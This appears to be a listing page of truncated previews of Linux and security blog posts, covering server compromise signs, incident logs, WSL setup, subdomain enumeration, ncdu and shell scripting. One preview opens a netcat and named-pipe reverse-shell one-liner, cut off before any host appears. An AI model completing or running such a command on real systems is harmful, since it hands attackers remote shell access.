Member-only story
6 Signs Your Linux Server Might Be Compromised (And What to Do Next)
Follow--Share
✍️ Full Blog Content:
Intro:
Most attacks on Linux servers aren’t dr...
Member-only story
7 Critical Linux Logs You Should Review After a Security Incident
--Share
✍️ Full Blog Content:
Intro:
The first hour after a security incident is crucia...
In order to run Ollama in your local system, the best way is to use docker in the Windows Subsystem for Linux. This is a tutorial going over what needs to be done.
🐧 Installing WSL and Dock...
If you're into serious subdomain enumeration and tired of hitting the same limits with Subfinder, Assetfinder, and the usual OSINT suspects — let me introduce you to SubFors, an open-source beast de...
Table Of Content
Introduction
What is This Magical Wand?
Essential Commands for Beginners
Tips That Saved Me
My Experience and Challenges
Conclusion
Introduction:
Welcome to my 30 d...
One-liners like the following are often used in offensive security contexts to establish shell access via netcat and named pipes:
⛶rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | ...
Let’s celebrate this Space Day and review your disk’s space of your laptopIt’s easy todo with ncduJust install and run:
⛶# macos
brew install ncdu
# linux ubuntu
apt install ncdu
# linux fed...
Table of Contents
Why Monitoring Matters
What to Monitor (Key Performance Metrics)
1. CPU Usage
2. Memory Usage
3. Disk I/O and Storage
4. Network Usage
5. Processes and Services
6. Syste...
Let's continue our shell scripting series in Linux. Today we will be looking at the 'Continue'command and the use cases for this command to be used in your script.In Linux shell scripting, the continu...